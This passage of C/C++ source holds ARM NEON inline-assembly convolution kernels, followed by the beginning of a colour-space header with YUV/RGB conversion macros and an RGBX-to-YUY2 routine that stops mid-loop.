"subs w4, w4, #1 \n"
"fmla v9.4s, v5.4s, v0.s[0] \n"
"fmla v11.4s, v5.4s, v0.s[1] \n"
"fmla v13.4s, v5.4s, v0.s[2] \n"
"fmla v15.4s, v5.4s, v0.s[3] \n"
"bne 2b \n"
"3: \n"
"st1 {v8.4s, v9.4s}, [%0], #32 \n"
"st1 {v10.4s, v11.4s}, [%1], #32 \n"
"st1 {v12.4s, v13.4s}, [%2], #32 \n"
"st1 {v14.4s, v15.4s}, [%3], #32 \n"
: "=r"(outptr0), // %0
"=r"(outptr1), // %1
"=r"(outptr2), // %2
"=r"(outptr3), // %3
"=r"(tmpptr), // %4
"=r"(kptr) // %5
: "0"(outptr0),
"1"(outptr1),
"2"(outptr2),
"3"(outptr3),
"4"(tmpptr),
"5"(kptr),
"r"(biasptr), // %12
"r"(inch) // %13
: "cc", "memory", "x4", "v0", "v1", "v2", "v3", "v4", "v5", "v6", "v7", "v8", "v9", "v10", "v11", "v12", "v13", "v14", "v15", "v16", "v17", "v18", "v19"
);
#else // __ARMV8
asm volatile(
"vld1.f32 {d0-d1}, [%12] \n"
"vdup.f32 q8, d0[0] \n"
"vdup.f32 q9, d0[0] \n"
"vdup.f32 q10, d0[1] \n"
"vdup.f32 q11, d0[1] \n"
"vdup.f32 q12, d1[0] \n"
"vdup.f32 q13, d1[0] \n"
"vdup.f32 q14, d1[1] \n"
"vdup.f32 q15, d1[1] \n"
// inch loop
"lsr r4, %13, #2 \n"// r4 = nn = inch >> 2
"cmp r4, #0 \n"
"beq 1f \n"
"0: \n"
"pld [%4, #512] \n"
"vldm %4!, {d8-d15} \n"
// "vld1.f32 {d8-d11}, [%4 :128]! \n"
// "vld1.f32 {d12-d15}, [%4 :128]! \n"
"pld [%5, #512] \n"
"vldm %5!, {d0-d7} \n"
// "vld1.f32 {d0-d3}, [%5 :128]! \n"
// "vld1.f32 {d4-d7}, [%5 :128]! \n"
"vmla.f32 q8, q4, d0[0] \n"
"vmla.f32 q10, q4, d0[1] \n"
"vmla.f32 q12, q4, d1[0] \n"
"vmla.f32 q14, q4, d1[1] \n"
"vmla.f32 q9, q5, d0[0] \n"
"vmla.f32 q11, q5, d0[1] \n"
"vmla.f32 q13, q5, d1[0] \n"
"vmla.f32 q15, q5, d1[1] \n"
"vmla.f32 q8, q6, d2[0] \n"
"vmla.f32 q10, q6, d2[1] \n"
"vmla.f32 q12, q6, d3[0] \n"
"vmla.f32 q14, q6, d3[1] \n"
"vmla.f32 q9, q7, d2[0] \n"
"vmla.f32 q11, q7, d2[1] \n"
"vmla.f32 q13, q7, d3[0] \n"
"vmla.f32 q15, q7, d3[1] \n"
"pld [%4, #512] \n"
"vldm %4!, {d8-d15} \n"
// "vld1.f32 {d8-d11}, [%4 :128]! \n"
// "vld1.f32 {d12-d15}, [%4 :128]! \n"
"vmla.f32 q8, q4, d4[0] \n"
"vmla.f32 q10, q4, d4[1] \n"
"vmla.f32 q12, q4, d5[0] \n"
"vmla.f32 q14, q4, d5[1] \n"
"vmla.f32 q9, q5, d4[0] \n"
"vmla.f32 q11, q5, d4[1] \n"
"vmla.f32 q13, q5, d5[0] \n"
"vmla.f32 q15, q5, d5[1] \n"
"subs r4, r4, #1 \n"
"vmla.f32 q8, q6, d6[0] \n"
"vmla.f32 q10, q6, d6[1] \n"
"vmla.f32 q12, q6, d7[0] \n"
"vmla.f32 q14, q6, d7[1] \n"
"vmla.f32 q9, q7, d6[0] \n"
"vmla.f32 q11, q7, d6[1] \n"
"vmla.f32 q13, q7, d7[0] \n"
"vmla.f32 q15, q7, d7[1] \n"
"bne 0b \n"
"1: \n"
// remain loop
"and r4, %13, #3 \n"// r4 = remain = inch & 3;
"cmp r4, #0 \n"
"beq 3f \n"
"2: \n"
"pld [%4, #256] \n"
"vld1.f32 {d8-d11}, [%4 :128]! \n"
"pld [%5, #128] \n"
"vld1.f32 {d0-d1}, [%5 :128]! \n"
"vmla.f32 q8, q4, d0[0] \n"
"vmla.f32 q10, q4, d0[1] \n"
"vmla.f32 q12, q4, d1[0] \n"
"vmla.f32 q14, q4, d1[1] \n"
"subs r4, r4, #1 \n"
"vmla.f32 q9, q5, d0[0] \n"
"vmla.f32 q11, q5, d0[1] \n"
"vmla.f32 q13, q5, d1[0] \n"
"vmla.f32 q15, q5, d1[1] \n"
"bne 2b \n"
"3: \n"
"vst1.f32 {d16-d19}, [%0 :128]! \n"
"vst1.f32 {d20-d23}, [%1 :128]! \n"
"vst1.f32 {d24-d27}, [%2 :128]! \n"
"vst1.f32 {d28-d31}, [%3 :128]! \n"
: "=r"(outptr0), // %0
"=r"(outptr1), // %1
"=r"(outptr2), // %2
"=r"(outptr3), // %3
"=r"(tmpptr), // %4
"=r"(kptr) // %5
: "0"(outptr0),
"1"(outptr1),
"2"(outptr2),
"3"(outptr3),
"4"(tmpptr),
"5"(kptr),
"r"(biasptr), // %12
"r"(inch) // %13
: "cc", "memory", "r4", "q0", "q1", "q2", "q3", "q4", "q5", "q6", "q7", "q8", "q9", "q10", "q11", "q12", "q13", "q14", "q15"
);
#endif // __ARMV8
}
for (; i + 3<size; i += 4)
{
const float* tmpptr = tmp.channel(i / 8 + (i % 8) / 4);
#if __ARMV8
const float* kptr = kernel.channel(p / 8 + (p % 8) / 4);
#else
const float* kptr = kernel.channel(p / 4);
#endif // __ARMV8
#if __ARMV8
asm volatile(
"ld1 {v0.4s}, [%12] \n"
"dup v8.4s, v0.s[0] \n"
"dup v9.4s, v0.s[1] \n"
"dup v10.4s, v0.s[2] \n"
"dup v11.4s, v0.s[3] \n"
// inch loop
"lsr w4, %w13, #2 \n"// w4 = nn = inch >> 2
"cmp w4, #0 \n"
"beq 1f \n"
"0: \n"
"prfm pldl1keep, [%4, #512] \n"
"ld1 {v4.4s, v5.4s, v6.4s, v7.4s}, [%4], #64 \n"
"prfm pldl1keep, [%5, #512] \n"
"ld1 {v0.4s, v1.4s, v2.4s, v3.4s}, [%5], #64 \n"
"fmla v8.4s, v4.4s, v0.s[0] \n"
"fmla v9.4s, v4.4s, v0.s[1] \n"
"fmla v10.4s, v4.4s, v0.s[2] \n"
"fmla v11.4s, v4.4s, v0.s[3] \n"
"fmla v8.4s, v5.4s, v1.s[0] \n"
"fmla v9.4s, v5.4s, v1.s[1] \n"
"fmla v10.4s, v5.4s, v1.s[2] \n"
"fmla v11.4s, v5.4s, v1.s[3] \n"
"subs w4, w4, #1 \n"
"fmla v8.4s, v6.4s, v2.s[0] \n"
"fmla v9.4s, v6.4s, v2.s[1] \n"
"fmla v10.4s, v6.4s, v2.s[2] \n"
"fmla v11.4s, v6.4s, v2.s[3] \n"
"fmla v8.4s, v7.4s, v3.s[0] \n"
"fmla v9.4s, v7.4s, v3.s[1] \n"
"fmla v10.4s, v7.4s, v3.s[2] \n"
"fmla v11.4s, v7.4s, v3.s[3] \n"
"bne 0b \n"
"1: \n"
// remain loop
"and w4, %w13, #3 \n"// w4 = remain = inch & 3;
"cmp w4, #0 \n"
"beq 3f \n"
"2: \n"
"prfm pldl1keep, [%4, #128] \n"
"ld1 {v4.4s}, [%4], #16 \n"
"prfm pldl1keep, [%5, #128] \n"
"ld1 {v0.4s}, [%5], #16 \n"
"subs w4, w4, #1 \n"
"fmla v8.4s, v4.4s, v0.s[0] \n"
"fmla v9.4s, v4.4s, v0.s[1] \n"
"fmla v10.4s, v4.4s, v0.s[2] \n"
"fmla v11.4s, v4.4s, v0.s[3] \n"
"bne 2b \n"
"3: \n"
"st1 {v8.4s}, [%0], #16 \n"
"st1 {v9.4s}, [%1], #16 \n"
"st1 {v10.4s}, [%2], #16 \n"
"st1 {v11.4s}, [%3], #16 \n"
: "=r"(outptr0), // %0
"=r"(outptr1), // %1
"=r"(outptr2), // %2
"=r"(outptr3), // %3
"=r"(tmpptr), // %4
"=r"(kptr) // %5
: "0"(outptr0),
"1"(outptr1),
"2"(outptr2),
"3"(outptr3),
"4"(tmpptr),
"5"(kptr),
"r"(biasptr), // %12
"r"(inch) // %13
: "cc", "memory", "x4", "v0", "v1", "v2", "v3", "v4", "v5", "v6", "v7", "v8", "v9", "v10", "v11"
);
#else // __ARMV8
asm volatile(
"vld1.f32 {d0-d1}, [%12] \n"
"vdup.f32 q8, d0[0] \n"
"vdup.f32 q9, d0[1] \n"
"vdup.f32 q10, d1[0] \n"
"vdup.f32 q11, d1[1] \n"
// inch loop
"lsr r4, %13, #2 \n"// r4 = nn = inch >> 2
"cmp r4, #0 \n"
"beq 1f \n"
"0: \n"
"pld [%4, #512] \n"
"vldm %4!, {d8-d15} \n"
// "vld1.f32 {d8-d11}, [%4 :128]! \n"
// "vld1.f32 {d12-d15}, [%4 :128]! \n"
"pld [%5, #512] \n"
"vldm %5!, {d0-d7} \n"
// "vld1.f32 {d0-d3}, [%5 :128]! \n"
// "vld1.f32 {d4-d7}, [%5 :128]! \n"
"vmla.f32 q8, q4, d0[0] \n"
"vmla.f32 q9, q4, d0[1] \n"
"vmla.f32 q10, q4, d1[0] \n"
"vmla.f32 q11, q4, d1[1] \n"
"vmla.f32 q8, q5, d2[0] \n"
"vmla.f32 q9, q5, d2[1] \n"
"vmla.f32 q10, q5, d3[0] \n"
"vmla.f32 q11, q5, d3[1] \n"
"subs r4, r4, #1 \n"
"vmla.f32 q8, q6, d4[0] \n"
"vmla.f32 q9, q6, d4[1] \n"
"vmla.f32 q10, q6, d5[0] \n"
"vmla.f32 q11, q6, d5[1] \n"
"vmla.f32 q8, q7, d6[0] \n"
"vmla.f32 q9, q7, d6[1] \n"
"vmla.f32 q10, q7, d7[0] \n"
"vmla.f32 q11, q7, d7[1] \n"
"bne 0b \n"
"1: \n"
// remain loop
"and r4, %13, #3 \n"// r4 = remain = inch & 3;
"cmp r4, #0 \n"
"beq 3f \n"
"2: \n"
"pld [%4, #128] \n"
"vld1.f32 {d8-d9}, [%4 :128]! \n"
"pld [%5, #128] \n"
"vld1.f32 {d0-d1}, [%5 :128]! \n"
"subs r4, r4, #1 \n"
"vmla.f32 q8, q4, d0[0] \n"
"vmla.f32 q9, q4, d0[1] \n"
"vmla.f32 q10, q4, d1[0] \n"
"vmla.f32 q11, q4, d1[1] \n"
"bne 2b \n"
"3: \n"
"vst1.f32 {d16-d17}, [%0 :128]! \n"
"vst1.f32 {d18-d19}, [%1 :128]! \n"
"vst1.f32 {d20-d21}, [%2 :128]! \n"
"vst1.f32 {d22-d23}, [%3 :128]! \n"
: "=r"(outptr0), // %0
"=r"(outptr1), // %1
"=r"(outptr2), // %2
"=r"(outptr3), // %3
"=r"(tmpptr), // %4
"=r"(kptr) // %5
: "0"(outptr0),
"1"(outptr1),
"2"(outptr2),
"3"(outptr3),
"4"(tmpptr),
"5"(kptr),
"r"(biasptr), // %12
"r"(inch) // %13
: "cc", "memory", "r4", "q0", "q1", "q2", "q3", "q4", "q5", "q6", "q7", "q8", "q9", "q10", "q11"
);
#endif // __ARMV8
}
for (; i<size; i++)
{
const float* tmpptr = tmp.channel(i / 8 + (i % 8) / 4 + i % 4);
#if __ARMV8
const float* kptr = kernel.channel(p / 8 + (p % 8) / 4);
#else
const float* kptr = kernel.channel(p / 4);
#endif // __ARMV8
#if __ARMV8
asm volatile(
"ld1 {v12.4s}, [%12] \n"
// inch loop
"lsr w4, %w13, #2 \n"// w4 = nn = inch >> 2
"cmp w4, #0 \n"
"beq 1f \n"
"eor v8.16b, v8.16b, v8.16b \n"
"eor v9.16b, v9.16b, v9.16b \n"
"eor v10.16b, v10.16b, v10.16b \n"
"eor v11.16b, v11.16b, v11.16b \n"
"0: \n"
"prfm pldl1keep, [%4, #128] \n"
"ld1 {v4.4s}, [%4], #16 \n"
"prfm pldl1keep, [%5, #512] \n"
"ld1 {v0.4s, v1.4s, v2.4s, v3.4s}, [%5], #64 \n"
"subs w4, w4, #1 \n"
"fmla v8.4s, v0.4s, v4.s[0] \n"
"fmla v9.4s, v1.4s, v4.s[1] \n"
"fmla v10.4s, v2.4s, v4.s[2] \n"
"fmla v11.4s, v3.4s, v4.s[3] \n"
"bne 0b \n"
"fadd v8.4s, v8.4s, v9.4s \n"
"fadd v10.4s, v10.4s, v11.4s \n"
"fadd v8.4s, v8.4s, v10.4s \n"
"fadd v12.4s, v12.4s, v8.4s \n"
"1: \n"
// remain loop
"and w4, %w13, #3 \n"// w4 = remain = inch & 3;
"cmp w4, #0 \n"
"beq 3f \n"
"2: \n"
"prfm pldl1keep, [%4, #32] \n"
"ld1r {v4.4s}, [%4], #4 \n"
"prfm pldl1keep, [%5, #128] \n"
"ld1 {v0.4s}, [%5], #16 \n"
"subs w4, w4, #1 \n"
"fmla v12.4s, v4.4s, v0.4s \n"
"bne 2b \n"
"3: \n"
"st1 {v12.s}[0], [%0], #4 \n"
"st1 {v12.s}[1], [%1], #4 \n"
"st1 {v12.s}[2], [%2], #4 \n"
"st1 {v12.s}[3], [%3], #4 \n"
: "=r"(outptr0), // %0
"=r"(outptr1), // %1
"=r"(outptr2), // %2
"=r"(outptr3), // %3
"=r"(tmpptr), // %4
"=r"(kptr) // %5
: "0"(outptr0),
"1"(outptr1),
"2"(outptr2),
"3"(outptr3),
"4"(tmpptr),
"5"(kptr),
"r"(biasptr), // %12
"r"(inch) // %13
: "cc", "memory", "x4", "v0", "v1", "v2", "v3", "v4", "v8", "v9", "v10", "v11", "v12"
);
#else // __ARMV8
asm volatile(
"vld1.f32 {d24-d25}, [%12] \n"
// inch loop
"lsr r4, %13, #2 \n"// r4 = nn = inch >> 2
"cmp r4, #0 \n"
"beq 1f \n"
"veor q8, q8, q8 \n"
"veor q9, q9, q9 \n"
"veor q10, q10, q10 \n"
"veor q11, q11, q11 \n"
"0: \n"
"pld [%4, #128] \n"
"vld1.f32 {d8-d9}, [%4 :128]! \n"
"pld [%5, #512] \n"
"vldm %5!, {d0-d7} \n"
// "vld1.f32 {d0-d3}, [%5 :128]! \n"
// "vld1.f32 {d4-d7}, [%5 :128]! \n"
"subs r4, r4, #1 \n"
"vmla.f32 q8, q0, d8[0] \n"
"vmla.f32 q9, q1, d8[1] \n"
"vmla.f32 q10, q2, d9[0] \n"
"vmla.f32 q11, q3, d9[1] \n"
"bne 0b \n"
"vadd.f32 q8, q8, q9 \n"
"vadd.f32 q10, q10, q11 \n"
"vadd.f32 q8, q8, q10 \n"
"vadd.f32 q12, q12, q8 \n"
"1: \n"
// remain loop
"and r4, %13, #3 \n"// r4 = remain = inch & 3;
"cmp r4, #0 \n"
"beq 3f \n"
"2: \n"
"pld [%4, #32] \n"
"vld1.f32 {d8[],d9[]}, [%4]! \n"
"pld [%5, #128] \n"
"vld1.f32 {d0-d1}, [%5 :128]! \n"
"subs r4, r4, #1 \n"
"vmla.f32 q12, q4, q0 \n"
"bne 2b \n"
"3: \n"
"vst1.f32 {d24[0]}, [%0]! \n"
"vst1.f32 {d24[1]}, [%1]! \n"
"vst1.f32 {d25[0]}, [%2]! \n"
"vst1.f32 {d25[1]}, [%3]! \n"
: "=r"(outptr0), // %0
"=r"(outptr1), // %1
"=r"(outptr2), // %2
"=r"(outptr3), // %3
"=r"(tmpptr), // %4
"=r"(kptr) // %5
: "0"(outptr0),
"1"(outptr1),
"2"(outptr2),
"3"(outptr3),
"4"(tmpptr),
"5"(kptr),
"r"(biasptr), // %12
"r"(inch) // %13
: "cc", "memory", "r4", "q0", "q1", "q2", "q3", "q4", "q8", "q9", "q10", "q11", "q12"
);
#endif // __ARMV8
}
}
remain_outch_start += nn_outch << 2;
#pragma omp parallel for num_threads(opt.num_threads)
for (int p = remain_outch_start; p<outch; p++)
{
Mat out0 = top_blob.channel(p);
const float bias0 = bias ? bias[p] : 0.f;
float* outptr0 = out0;
int i = 0;
for (; i + 7<size; i += 8)
{
const float* tmpptr = tmp.channel(i / 8);
#if __ARMV8
const float* kptr = kernel.channel(p / 8 + (p % 8) / 4 + p % 4);
#else
const float* kptr = kernel.channel(p / 4 + p % 4);
#endif // __ARMV8
#if __ARMV8
asm volatile(
"dup v8.4s, %w6 \n"
"dup v9.4s, %w6 \n"
// inch loop
"lsr w4, %w7, #2 \n"// w4 = nn = inch >> 2
"cmp w4, #0 \n"
"beq 1f \n"
"0: \n"
"prfm pldl1keep, [%1, #512] \n"
"ld1 {v4.4s, v5.4s, v6.4s, v7.4s}, [%1], #64 \n"
"prfm pldl1keep, [%2, #128] \n"
"ld1 {v0.4s}, [%2], #16 \n"
"fmla v8.4s, v4.4s, v0.s[0] \n"
"fmla v9.4s, v5.4s, v0.s[0] \n"
"prfm pldl1keep, [%1, #512] \n"
"ld1 {v12.4s, v13.4s, v14.4s, v15.4s}, [%1], #64 \n"
"fmla v8.4s, v6.4s, v0.s[1] \n"
"fmla v9.4s, v7.4s, v0.s[1] \n"
"subs w4, w4, #1 \n"
"fmla v8.4s, v12.4s, v0.s[2] \n"
"fmla v9.4s, v13.4s, v0.s[2] \n"
"fmla v8.4s, v14.4s, v0.s[3] \n"
"fmla v9.4s, v15.4s, v0.s[3] \n"
"bne 0b \n"
"1: \n"
// remain loop
"and w4, %w7, #3 \n"// w4 = remain = inch & 3;
"cmp w4, #0 \n"
"beq 3f \n"
"2: \n"
"prfm pldl1keep, [%1, #256] \n"
"ld1 {v4.4s, v5.4s}, [%1], #32 \n"
"prfm pldl1keep, [%2, #32] \n"
"ld1r {v0.4s}, [%2], #4 \n"
"subs w4, w4, #1 \n"
"fmla v8.4s, v4.4s, v0.4s \n"
"fmla v9.4s, v5.4s, v0.4s \n"
"bne 2b \n"
"3: \n"
"st1 {v8.4s, v9.4s}, [%0], #32 \n"
: "=r"(outptr0), // %0
"=r"(tmpptr), // %1
"=r"(kptr) // %2
: "0"(outptr0),
"1"(tmpptr),
"2"(kptr),
"r"(bias0), // %6
"r"(inch) // %7
: "cc", "memory", "x4", "v0", "v4", "v5", "v6", "v7", "v8", "v9", "v12", "v13", "v14", "v15"
);
#else // __ARMV8
asm volatile(
"vdup.f32 q8, %6 \n"
"vdup.f32 q9, %6 \n"
// inch loop
"lsr r4, %7, #2 \n"// r4 = nn = inch >> 2
"cmp r4, #0 \n"
"beq 1f \n"
"0: \n"
"pld [%1, #512] \n"
"vldm %1!, {d8-d15} \n"
// "vld1.f32 {d8-d11}, [%1 :128]! \n"
// "vld1.f32 {d12-d15}, [%1 :128]! \n"
"pld [%2, #128] \n"
"vld1.f32 {d0-d1}, [%2 :128]! \n"
"vmla.f32 q8, q4, d0[0] \n"
"vmla.f32 q9, q5, d0[0] \n"
"pld [%1, #512] \n"
"vldm %1!, {d24-d31} \n"
// "vld1.f32 {d24-d27}, [%1 :128]! \n"
// "vld1.f32 {d28-d31}, [%1 :128]! \n"
"vmla.f32 q8, q6, d0[1] \n"
"vmla.f32 q9, q7, d0[1] \n"
"subs r4, r4, #1 \n"
"vmla.f32 q8, q12, d1[0] \n"
"vmla.f32 q9, q13, d1[0] \n"
"vmla.f32 q8, q14, d1[1] \n"
"vmla.f32 q9, q15, d1[1] \n"
"bne 0b \n"
"1: \n"
// remain loop
"and r4, %7, #3 \n"// r4 = remain = inch & 3;
"cmp r4, #0 \n"
"beq 3f \n"
"2: \n"
"pld [%1, #256] \n"
"vld1.f32 {d8-d11}, [%1 :128]! \n"
"pld [%2, #32] \n"
"vld1.f32 {d0[],d1[]}, [%2]! \n"
"subs r4, r4, #1 \n"
"vmla.f32 q8, q4, q0 \n"
"vmla.f32 q9, q5, q0 \n"
"bne 2b \n"
"3: \n"
"vst1.f32 {d16-d19}, [%0 :128]! \n"
: "=r"(outptr0), // %0
"=r"(tmpptr), // %1
"=r"(kptr) // %2
: "0"(outptr0),
"1"(tmpptr),
"2"(kptr),
"r"(bias0), // %6
"r"(inch) // %7
: "cc", "memory", "r4", "q0", "q4", "q5", "q6", "q7", "q8", "q9", "q12", "q13", "q14", "q15"
);
#endif // __ARMV8
}
for (; i + 3<size; i += 4)
{
const float* tmpptr = tmp.channel(i / 8 + (i % 8) / 4);
#if __ARMV8
const float* kptr = kernel.channel(p / 8 + (p % 8) / 4 + p % 4);
#else
const float* kptr = kernel.channel(p / 4 + p % 4);
#endif // __ARMV8
#if __ARMV8
asm volatile(
"dup v8.4s, %w6 \n"
// inch loop
"lsr w4, %w7, #2 \n"// w4 = nn = inch >> 2
"cmp w4, #0 \n"
"beq 1f \n"
"0: \n"
"prfm pldl1keep, [%1, #512] \n"
"ld1 {v4.4s, v5.4s, v6.4s, v7.4s}, [%1], #64 \n"
"prfm pldl1keep, [%2, #128] \n"
"ld1 {v0.4s}, [%2], #16 \n"
"subs w4, w4, #1 \n"
"fmla v8.4s, v4.4s, v0.s[0] \n"
"fmla v8.4s, v5.4s, v0.s[1] \n"
"fmla v8.4s, v6.4s, v0.s[2] \n"
"fmla v8.4s, v7.4s, v0.s[3] \n"
"bne 0b \n"
"1: \n"
// remain loop
"and w4, %w7, #3 \n"// w4 = remain = inch & 3;
"cmp w4, #0 \n"
"beq 3f \n"
"2: \n"
"prfm pldl1keep, [%1, #128] \n"
"ld1 {v4.4s}, [%1], #16 \n"
"prfm pldl1keep, [%2, #32] \n"
"ld1r {v0.4s}, [%2], #4 \n"
"subs w4, w4, #1 \n"
"fmla v8.4s, v4.4s, v0.4s \n"
"bne 2b \n"
"3: \n"
"st1 {v8.4s}, [%0], #16 \n"
: "=r"(outptr0), // %0
"=r"(tmpptr), // %1
"=r"(kptr) // %2
: "0"(outptr0),
"1"(tmpptr),
"2"(kptr),
"r"(bias0), // %6
"r"(inch) // %7
: "cc", "memory", "x4", "v0", "v4", "v5", "v6", "v7", "v8"
);
#else // __ARMV8
asm volatile(
"vdup.f32 q8, %6 \n"
// inch loop
"lsr r4, %7, #2 \n"// r4 = nn = inch >> 2
"cmp r4, #0 \n"
"beq 1f \n"
"0: \n"
"pld [%1, #512] \n"
"vldm %1!, {d8-d15} \n"
// "vld1.f32 {d8-d11}, [%1 :128]! \n"
// "vld1.f32 {d12-d15}, [%1 :128]! \n"
"pld [%2, #128] \n"
"vld1.f32 {d0-d1}, [%2]! \n"
"subs r4, r4, #1 \n"
"vmla.f32 q8, q4, d0[0] \n"
"vmla.f32 q8, q5, d0[1] \n"
"vmla.f32 q8, q6, d1[0] \n"
"vmla.f32 q8, q7, d1[1] \n"
"bne 0b \n"
"1: \n"
// remain loop
"and r4, %7, #3 \n"// r4 = remain = inch & 3;
"cmp r4, #0 \n"
"beq 3f \n"
"2: \n"
"pld [%1, #128] \n"
"vld1.f32 {d8-d9}, [%1 :128]! \n"
"pld [%2, #32] \n"
"vld1.f32 {d0[],d1[]}, [%2]! \n"
"subs r4, r4, #1 \n"
"vmla.f32 q8, q4, q0 \n"
"bne 2b \n"
"3: \n"
"vst1.f32 {d16-d17}, [%0 :128]! \n"
: "=r"(outptr0), // %0
"=r"(tmpptr), // %1
"=r"(kptr) // %2
: "0"(outptr0),
"1"(tmpptr),
"2"(kptr),
"r"(bias0), // %6
"r"(inch) // %7
: "cc", "memory", "r4", "q0", "q4", "q5", "q6", "q7", "q8"
);
#endif // __ARMV8
}
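// Reference sketch (hypothetical, comment-only): the unrolled assembly
// kernels above are equivalent to this NEON intrinsics loop, which
// accumulates four (or, in the 8-pixel kernel, eight) output pixels of one
// output channel, scaling each packed pixel group by one kernel weight per
// input channel:
//
//   float32x4_t _sum = vdupq_n_f32(bias0);
//   for (int q = 0; q < inch; q++) {
//       float32x4_t _p = vld1q_f32(tmpptr); tmpptr += 4; // 4 pixels, channel q
//       _sum = vmlaq_n_f32(_sum, _p, kptr[0]); kptr++;   // scale by weight q
//   }
//   vst1q_f32(outptr0, _sum); outptr0 += 4;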
for (; i<size; i++)
{
const float* tmpptr = tmp.channel(i / 8 + (i % 8) / 4 + i % 4);
#if __ARMV8
const float* kptr = kernel.channel(p / 8 + (p % 8) / 4 + p % 4);
#else
const float* kptr = kernel.channel(p / 4 + p % 4);
#endif // __ARMV8
int q = 0;
float32x4_t _sum0 = vdupq_n_f32(0.f);
for (; q + 3<inch; q += 4)
{
float32x4_t _p0 = vld1q_f32(tmpptr);
tmpptr += 4;
float32x4_t _k0 = vld1q_f32(kptr);
kptr += 4;
#if __ARMV8
_sum0 = vfmaq_f32(_sum0, _p0, _k0);
#else
_sum0 = vmlaq_f32(_sum0, _p0, _k0);
#endif
}
#if __ARMV8
float sum0 = bias0 + vaddvq_f32(_sum0);
#else
float32x2_t _ss = vadd_f32(vget_low_f32(_sum0), vget_high_f32(_sum0));
float sum0 = bias0 + vget_lane_f32(vpadd_f32(_ss, _ss), 0);
#endif
for (; q<inch; q++)
{
sum0 += tmpptr[0] * kptr[0];
tmpptr++;
kptr++;
}
outptr0[0] = sum0;
outptr0++;
}
}
}
|
colorspace_ops.h | #ifndef colorspace_ops_h
#define colorspace_ops_h
#include <aRibeiroCore/aRibeiroCore.h>
#include <aRibeiroPlatform/aRibeiroPlatform.h>
using namespace aRibeiro;
#include <stdint.h>
#include <stdlib.h>
#include <memory.h>
#include <string.h>
#if defined(ARIBEIRO_SSE2)
#ifdef _MSC_VER //_WIN32
#include <intrin.h>
#else
#include <x86intrin.h> // Everything on SIMD...
#endif
#elif defined(ARIBEIRO_NEON)
#include <arm_neon.h>
#endif
ARIBEIRO_INLINE
static int iClamp(int v) {
if (v > 255)
return 255;
else if (v < 0)
return 0;
else
return v;
}
// from: https://en.wikipedia.org/wiki/YUV - Y′UV444 to RGB888 conversion
//
// C = (Y - 16)*298
// D = U - 128
// E = V - 128
//
#define YUV2RO(C, D, E) iClamp(((C) + 409 * (E) + 128) >> 8)
#define YUV2GO(C, D, E) iClamp(((C) - 100 * (D) - 208 * (E) + 128) >> 8)
#define YUV2BO(C, D, E) iClamp(((C) + 516 * (D) + 128) >> 8)
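// Usage sketch (illustrative; yuv_to_rgb_pixel is not part of the original
// API): expands one Y'UV444 sample to RGB888 using the macros above.
ARIBEIRO_INLINE
static void yuv_to_rgb_pixel(uint8_t y, uint8_t u, uint8_t v,
uint8_t *r, uint8_t *g, uint8_t *b) {
int C = ((int)y - 16) * 298;
int D = (int)u - 128;
int E = (int)v - 128;
*r = (uint8_t)YUV2RO(C, D, E);
*g = (uint8_t)YUV2GO(C, D, E);
*b = (uint8_t)YUV2BO(C, D, E);
}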
// from: https://en.wikipedia.org/wiki/YUV - RGB888 to Y′UV444 conversion
//
// RGB -> YUV conversion macros
//
#define RGB2Y(r, g, b) (((66 * (r) + 129 * (g) + 25 * (b) + 128) >> 8) + 16)
#define RGB2U(r, g, b) (((-38 * (r) - 74 * (g) + 112 * (b) + 128) >> 8) + 128)
#define RGB2V(r, g, b) (((112 * (r) - 94 * (g) - 18 * (b) + 128) >> 8) + 128)
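// Companion sketch (illustrative; rgb_to_yuv_pixel is not part of the
// original API): packs one RGB888 sample into Y'UV444 components.
ARIBEIRO_INLINE
static void rgb_to_yuv_pixel(uint8_t r, uint8_t g, uint8_t b,
uint8_t *y, uint8_t *u, uint8_t *v) {
*y = (uint8_t)RGB2Y(r, g, b);
*u = (uint8_t)RGB2U(r, g, b);
*v = (uint8_t)RGB2V(r, g, b);
}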
const uint32_t FILTER_PRECISION_BITS = 10; // 2^10 = 1024 fixed-point steps
const uint32_t FILTER_TOTAL_COUNT = (1 << FILTER_PRECISION_BITS);
const uint32_t FILTER_MASK = FILTER_TOTAL_COUNT - 1;
const uint32_t FILTER_HALF = (FILTER_MASK >> 1);
#define FILTER_NEAREST 1
#define FILTER_LINEAR 2
#define FILTER_SELECT FILTER_LINEAR
// Y′UV422 (y1, u, y2, v) -> https://en.wikipedia.org/wiki/YUV
static uint8_t* alloc_yuy2_aligned(int width, int height){
int size = width * height * 2;
uint8_t* result = (uint8_t*)malloc_aligned(size);
memset(result, 127, size);
return result;
}
static uint8_t* alloc_rgb_to_rgbx_aligned(uint8_t *rgb, int w, int h) {
int size = w*h*4;
uint8_t* result = (uint8_t*)malloc_aligned(size);
for(int y=0;y<h;y++){
for(int x=0;x<w;x++){
int input_index = (y * w + x) * 3;
int output_index = (y * w + x) * 4;
result[output_index + 0] = rgb[input_index + 0];
result[output_index + 1] = rgb[input_index + 1];
result[output_index + 2] = rgb[input_index + 2];
result[output_index + 3] = 255; // padding byte; it would otherwise stay uninitialized
}
}
return result;
}
static void rgbx_to_yuy2(uint8_t *rgba,uint8_t *yuy2, int w, int h) {
uint32_t *rgba32 = (uint32_t *)rgba;
uint32_t *yuy2_32 = (uint32_t *)yuy2;
/*
for (int y = 0; y < h; y++) {
int rgba_line = y * w;
int yuyv_line = (y * w) >> 1;
for (int x = 0; x < w; x += 2) {
int rgb_access = rgba_line + x;
uint32_t rgb_a = rgba32[rgb_access];
uint8_t r_a = rgb_a & 0xff;
uint8_t g_a = (rgb_a >> 8) & 0xff;
uint8_t b_a = (rgb_a >> 16) & 0xff;
uint32_t rgb_b = rgba32[rgb_access + 1];
uint8_t r_b = rgb_b & 0xff;
uint8_t g_b = (rgb_b >> 8) & 0xff;
uint8_t b_b = (rgb_b >> 16) & 0xff;
uint32_t yuyv;
yuyv = (RGB2Y(r_a, g_a, b_a) & 0xff);
yuyv |= (RGB2U(r_a, g_a, b_a) & 0xff) << 8;
yuyv |= (RGB2Y(r_b, g_b, b_b) & 0xff) << 16;
yuyv |= (RGB2V(r_a, g_a, b_a) & 0xff) << 24;
int yuy2_access = yuyv_line + (x >> 1);
yuy2_32[yuy2_access] = yuyv;
}
}
*/
//#pragma omp parallel for
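// NOTE (added for clarity): the flattened loop below assumes w is even, so
// each (y0, u, y1, v) pair of source pixels falls on a single row.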
for (int _x = 0; _x < w * h; _x += 2) {
int x = _x % w;
int y = _x / w;
int rgba_line = y * w;
int yuyv_line = (y * w) >> 1;
int rgb_access = rgba_line + x;
uint32_t rgb_a = rgba32[rgb_access];
uint8_t r_a = rgb_a & 0xff;
